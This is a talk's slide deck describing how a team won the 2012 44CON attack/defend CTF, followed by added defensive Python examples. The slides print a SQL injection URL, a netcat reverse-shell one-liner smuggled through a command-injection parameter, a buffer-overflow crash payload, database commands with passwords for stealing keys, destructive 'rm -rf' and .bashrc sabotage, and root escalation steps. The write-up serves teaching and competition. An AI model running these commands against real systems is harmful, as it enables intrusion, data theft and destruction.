Playing 44CON CTF for fun and profit

Rundown of what it took to win the MWRLabs 44CON CTF in 2012 by the winning team 'Three Headed Monkeys'


  1. Playing the 44Con CTF for fun & profit
  2. Me
     "Three Headed Monkeys"
     3hm@0xbadf00d.co.uk
     @impdefined
  3. Me
     Software developer. Trying not to make things worse. Know a lot about bugs.
     CTF team 0xbadf00d. Contributor to io.smashthestack.org
  4. CTF
     Solving technical security challenges to get points.
     "It's kind of like a Computer Science exam on acid"*
     * CSAW CTF "About" page
  5. CTF Types
     Challenge-based: DEF CON quals, Ghost In The Shellcode, CSAW CTF
     Attack/defend: DEF CON finals, 44Con CTF (this year)
  6. 44CON CTF
  7. 44CON CTF - What we got
     Virtual Machine image
     IP Address
     Scope of "attackable" machines
  8. Attack & Defend
     Kind of like a pentest (maybe, I've never done a pentest)
     I have a plan: Recon, Harden, Write exploits, Run riot, Get the girl, Save the world
  9. Step 1 - Recon
     I'd rather be offline than owned
     Self-recon
     Capture traffic
     Quick nmap of non-player servers
  10. Recon - Services
  11. Recon - Services
  12. Recon - Scoring
      Regular "scoring rounds": score server stores new keys in services; score server checks for previous keys?
      Every 30 minutes. Not great if you're trying to see talks!
  13. pastie
  14. Pastie
  15. Pastie
  16. Pastie
      Written in PHP
      Pastes stored in a MySQL database
      Recon shows keys are stored as pastes
      PHP+MySQL - Can you tell what the vuln is yet?
  17. Pastie vuln
  18. Pastie vuln
      Classic SQL injection
  19. Pastie fix
      It's not all pwnpwnpwn. Not very sexy.
      Updated to use prepared statements
  20. Pastie exploit
      I want keys!
      Had a look at my own DB to figure out the query
  21. Pastie exploit
      https://ip/view/%+and+lang+=+text+order+by+date+desc+--+
  22. Pastie exploit
  23. Pastie exploit - scripted
  24. mailserver
  25. Mailserver
      SMTP and POP3 server
      Keys are stored in emails
      Written in Ruby. I don't know Ruby. ~500 lines
  26. Mailserver - vulnerability
  27. Mailserver - vulnerability
      ??? This just runs whatever Ruby code you give it
      Time to learn Ruby!
  28. Mailserver - verification
      Looking at the logs...
  29. Mailserver - exploitation
      I'm sure Ruby is lovely...
      ... but let's just find some code to copy
  30. Mailserver - exploitation
  31. Mailserver - exploitation
  32. Mailserver - scripted exploitation
  33. auth
  34. Auth
      Running on port 23500
  35. Auth
  36. Auth - vulnerability
      Source analysis 101
  37. Auth - exploitation
  38. Auth - exploitation
      Classic stack buffer overflow
      Overwrite return address with value of my choice
      Remote code execution......... right?
  39. Auth - exploitation
      Welcome to CTF rage
  40. Auth - exploitation
  41. Auth - exploitation
      Just put a valid writable address in the bufferptr!
      Easy if this was a 32bit process.
      Our memory space is annoying.
  42. Auth - exploitation
      gdb$ info proc map
      Mapped address spaces:
          Start Addr          End Addr            Size     Offset  objfile
          0x400000            0x403000            0x3000   0x0     /services/auth/auth
          0x602000            0x603000            0x1000   0x2000  /services/auth/auth
          0x603000            0x604000            0x1000   0x3000  /services/auth/auth
          0x604000            0x625000            0x21000  0x0     [heap]
          ........            ........            .......  ...     ......
          0x7ffffffde000      0x7ffffffff000      0x21000  0x0     [stack]
          0xffffffffff600000  0xffffffffff601000  0x1000   0x0     [vsyscall]
  43. Auth - exploitation
      gdb$ info proc map
      Mapped address spaces:
          Start Addr          End Addr            Size     Offset  objfile
          0x0000000000400000  0x0000000000403000  0x3000   0x0     /services/auth/auth
          0x0000000000602000  0x0000000000603000  0x1000   0x2000  /services/auth/auth
          0x0000000000603000  0x0000000000604000  0x1000   0x3000  /services/auth/auth
          0x0000000000604000  0x0000000000625000  0x21000  0x0     [heap]
          ........            ........            .......  ...     ......
          0x00007ffffffde000  0x00007ffffffff000  0x21000  0x0     [stack]
          0xffffffffff600000  0xffffffffff601000  0x1000   0x0     [vsyscall] (read-only)
      Written out as full 64-bit pointers, every writable mapping (binary, heap, stack) has an address that begins with null bytes; the only mapping whose address has none, vsyscall, is read-only.
  44. Auth - exploitation
      Time's up! No remote code execution :-(
      Very limited DoS: crash process, restarts automatically
  45. servicemon
  46. Servicemon
      Web page
      Looks like it monitors the other services
      Ruby again
  47. Servicemon - vulnerability
      Command execution of "filelist" parameter
  48. Servicemon - exploitation
      Never mind keys, I want a shell
          contestant@ubuntu:~$ nc -l 31337 -e /bin/sh
          nc: invalid option -- e
  49. Servicemon - exploitation
      *cracks knuckles*
          rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.75 31337 >/tmp/f
          http://ip:3000/hash?filelist=notafile||rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202>%261%7Cnc%20192.168.1.75%2031337%20>%2Ftmp%2Ff
  50. Servicemon - exploitation
          contestant@ubuntu:~$ nc -lv 31337
          Connection from 192.168.1.72 port 31337 [tcp/*] accepted
          $ whoami
          contestant
          $ pwd
          /services/servicemon
      Now we can have some fun!
  51. rampage
  52. Steal all the keys
          mysql --user=sinatra --password=44ConCTF servicemon -e "select status from statuses order by created_at desc limit 1;"
          mysql --user=pastie --password=J@cobsClub$ paste -e "select pastie from pastie order by date desc limit 1;"
          OUTPUT=`redis-cli -r 1 keys * | tail -n 1`
          redis-cli -r 1 lrange $OUTPUT 0 1
  53. Leave a calling card
          echo Look behind you! A three-headed monkey! >/services/pastie/.win
  54. Annoy
          echo export PROMPT_COMMAND="cd" >> ~/.bashrc
          echo exit >> ~/.bashrc
          rm -rf /services
  55. escalation
  56. Escalation
      Getting keys is fine
      Getting shells is better
      Getting root is best
  57. Escalation - the hard way
          $ find /etc -writable
          /etc/init/mail.conf
          /etc/init/auth.conf
  58. Escalation - the hard way
          USER  PID   TTY  STAT  COMMAND
          root  8680  ?    Ss    /services/auth/auth
  59. Escalation - the hard way
      Next time auth respawns we will get a root shell
      Lame DoS to the rescue!
          perl -e 'print "auth " . "A"x1100 . "\n"' | nc ip 23500
          Connection from 192.168.1.73 port 31337 [tcp/*] accepted
          # whoami
          root
  60. Escalation - the easy way
          220 Mail Service ready (33147)
          HELO
          250 Requested mail action okay, completed
          EXPN respond(client, `whoami`)
          root
  61. summary
  62. Summary
      CTFs are fun!
      http://smashthestack.org - start with io
      http://overthewire.org
      http://hackthissite.org
  63. questions
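The pastie injection (slides 18 to 21) beside the prepared-statement fix (slide 19), as an added Python example that is not code from the deck or from the pastie service. The real PHP query and MySQL schema are not on the slides, so the table layout is a constructed stand-in, and the payload is adapted from slide 21 to close the id quote in this constructed query.

```python
import sqlite3


def make_db():
    """Constructed stand-in for pastie's MySQL database; the real schema is not on the slides."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pastie (id TEXT, pastie TEXT, lang TEXT, date INTEGER)")
    db.executemany("INSERT INTO pastie VALUES (?, ?, ?, ?)", [
        ("abc123", "hello world", "text", 1),
        ("def456", "print('hi')", "python", 2),
        ("k9z7q2", "KEY{constructed-score-server-token}", "text", 3),  # newest paste = a key
    ])
    return db


def view_vulnerable(db, paste_id):
    """The pre-fix pattern: the URL path segment is spliced into the SQL text."""
    sql = "SELECT pastie FROM pastie WHERE id LIKE '%s'" % paste_id
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def view_fixed(db, paste_id):
    """The slide-19 fix: a prepared statement with the id passed as a bound parameter.

    Using '=' rather than LIKE matters too: a bound '%' can no longer break
    out of the statement, but with LIKE it would still match every row.
    """
    row = db.execute("SELECT pastie FROM pastie WHERE id = ?", (paste_id,)).fetchone()
    return row[0] if row else None


# Adapted from slide 21 for the constructed query above: matches every paste,
# sorts newest first (the scoring key), and comments out the rest of the statement.
PAYLOAD = "%' ORDER BY date DESC -- "
```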
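A hardened counterpart to the servicemon hash endpoint from slides 47 to 50, as an added Python example (servicemon itself is Ruby and its source is not on the page). It assumes the original handed the filelist parameter to a shell; this version validates every entry against the service directory and hashes in-process, so no shell is ever invoked.

```python
import hashlib
import os
import tempfile

# Characters that only make sense if the value were going to reach a shell.
SHELL_META = set("|;&$`<>()\n")


def resolve_filelist(filelist, base_dir):
    """Map the comma-separated 'filelist' parameter to (name, path) pairs.

    Raises ValueError unless every entry names an existing regular file
    inside base_dir. Nothing here is ever passed to a shell.
    """
    base = os.path.realpath(base_dir)
    resolved = []
    for name in filelist.split(","):
        name = name.strip()
        if not name or SHELL_META & set(name):
            raise ValueError("rejected filelist entry: %r" % name)
        full = os.path.realpath(os.path.join(base, name))
        # realpath collapses '..' and symlinks; the result must stay under base.
        if os.path.commonpath([base, full]) != base or not os.path.isfile(full):
            raise ValueError("not a file under %s: %r" % (base, name))
        resolved.append((name, full))
    return resolved


def hash_files(filelist, base_dir):
    """Return {entry: md5hex}; hashing in-process replaces a shell-out to md5sum."""
    result = {}
    for name, path in resolve_filelist(filelist, base_dir):
        with open(path, "rb") as fh:
            result[name] = hashlib.md5(fh.read()).hexdigest()
    return result


def is_accepted(filelist, base_dir):
    """True if the parameter passes validation (shows what gets rejected)."""
    try:
        resolve_filelist(filelist, base_dir)
        return True
    except ValueError:
        return False


def make_sample_dir():
    """Constructed stand-in for /services/servicemon with one monitored file."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "status.txt"), "wb") as fh:
        fh.write(b"auth: up\n")
    return d
```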
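The audit a defender would run for the "hard way" escalation on slides 57 to 59 (job definitions for root services that a non-root user can rewrite), as an added Python example that is not part of the deck. The init directory, file names and permission bits are constructed to mirror the slide's find output; they are not taken from the CTF image.

```python
import os
import stat
import tempfile

GROUP_OR_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def writable_job_files(init_dir):
    """Return names of .conf job definitions in init_dir that a non-owner could alter.

    A file is flagged if group/other can write it, or if the directory itself
    is group/other-writable without the sticky bit (the file could be replaced).
    """
    dir_mode = os.stat(init_dir).st_mode
    dir_open = bool(dir_mode & GROUP_OR_OTHER_WRITE) and not dir_mode & stat.S_ISVTX
    flagged = []
    for name in sorted(os.listdir(init_dir)):
        if not name.endswith(".conf"):
            continue
        mode = os.stat(os.path.join(init_dir, name)).st_mode
        if dir_open or mode & GROUP_OR_OTHER_WRITE:
            flagged.append(name)
    return flagged


def make_sample_init_dir():
    """Constructed stand-in for /etc/init: two loose job files and one correct one."""
    d = tempfile.mkdtemp()
    os.chmod(d, 0o755)
    for name, mode in (("auth.conf", 0o666), ("mail.conf", 0o664), ("pastie.conf", 0o644)):
        path = os.path.join(d, name)
        with open(path, "w") as fh:
            fh.write("# constructed job file\n")
        os.chmod(path, mode)
    return d
```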
